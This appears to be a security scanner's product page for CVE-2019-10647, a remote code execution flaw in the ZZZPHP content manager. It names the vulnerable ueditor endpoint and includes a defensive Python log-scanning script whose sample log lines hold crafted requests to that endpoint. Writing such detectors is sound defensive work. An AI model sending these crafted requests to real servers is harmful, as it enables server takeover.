CVE-2019-10647 Scanner
CVE-2019-10647 Scanner - Remote Code Execution (RCE) vulnerability in ZZZPHP
Short Info
Level: Single Scan
Can be used by: Asset Owner
Estimated Time: 10 seconds
Time Interval: 8 days 12 hours
Scan only one: Domain, Subdomain, IPv4
ZZZPHP is a web-based content management system designed for creating and managing websites. It is used by developers and web administrators to build dynamic websites with customizable features. The software is particularly popular among small to medium-sized businesses looking for an easy-to-use platform. ZZZPHP provides a range of plugins and extensions to enhance website functionality. Users benefit from the ability to manage site content, integrate multimedia elements, and improve site structure. As an open-source solution, ZZZPHP continuously attracts contributions from developers worldwide.
The Remote Code Execution (RCE) vulnerability in ZZZPHP arises from inadequate restrictions on file handling operations in the software. This flaw allows attackers to inject and execute arbitrary PHP code within the system. By exploiting it, attackers can remotely execute commands and scripts on the server without authentication. The flaw lies in the 'inc/zzz_file.php' file of the software. Given its critical nature, immediate remediation is advised to mitigate the risks associated with this vulnerability.
The vulnerability is reached through the 'plugins/ueditor/php/controller.php?action=catchimage' endpoint in ZZZPHP. Threat actors exploit this endpoint with a crafted URL that targets the 'source[]' parameter to execute malicious PHP code. Upon successful exploitation, the server processes and executes the attacker-supplied PHP code, which can lead to complete control of the server. The flaw reflects a gap in user input validation and execution policy within the software. Proper patch management and input sanitization are essential to address this security concern.
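A defender-side check for this endpoint, as an added example that is not part of the scanner or of ZZZPHP itself: it parses combined-format web server access log lines (constructed samples embedded inline) and flags requests to the ueditor controller that carry action=catchimage together with a source[] parameter, so such requests can be reviewed or alerted on. The log format, IP addresses and URLs are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined-format access log line (Apache/nginx); only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Endpoint named on the page for CVE-2019-10647.
VULN_PATH = "/plugins/ueditor/php/controller.php"

# Constructed sample log lines for demonstration; not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Apr/2019:12:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Apr/2019:12:00:02 +0000] "GET /plugins/ueditor/php/controller.php?action=catchimage&source[]=http://example.invalid/remote.txt HTTP/1.1" 200 88 "-" "curl/7.64.0"
203.0.113.7 - - [10/Apr/2019:12:00:03 +0000] "GET /plugins/ueditor/php/controller.php?action=config HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
198.51.100.2 - - [10/Apr/2019:12:00:04 +0000] "POST /plugins/ueditor/php/controller.php?action=catchimage&source%5B%5D=http://example.invalid/a.gif HTTP/1.1" 500 0 "-" "python-requests/2.21"
"""


def is_catchimage_request(target: str) -> bool:
    """True when the request targets the ueditor controller with action=catchimage and a source[] parameter."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(VULN_PATH):
        return False
    # parse_qs percent-decodes parameter names too, so source%5B%5D and source[] both become "source[]".
    params = parse_qs(parts.query, keep_blank_values=True)
    action = params.get("action", [""])[0].lower()
    has_source = any(k == "source" or k.startswith("source[") for k in params)
    return action == "catchimage" and has_source


def scan_access_log(text: str) -> list:
    """Return one record per matching request; any non-empty result is worth a review."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_catchimage_request(m["target"]):
            hits.append({"ip": m["ip"], "time": m["ts"], "method": m["method"],
                         "status": m["status"], "target": m["target"]})
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["ip"]} {hit["method"]} {hit["status"]} {hit["target"]}')
```

A status of 200 on a flagged request is the case to escalate; a 4xx or 5xx still indicates probing of the endpoint and is worth noting.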
If exploited, the RCE vulnerability can have significant impacts on the compromised server. Attackers can gain unauthorized access, exposing the server to data breaches and unauthorized data manipulations. Malicious entities could install backdoors or rootkits, further facilitating espionage or data exfiltration. Beyond data security risks, the compromised server might be used to launch further attacks against internal or external targets. Therefore, organizations need to act promptly to limit exposure and apply security measures to mitigate further risks.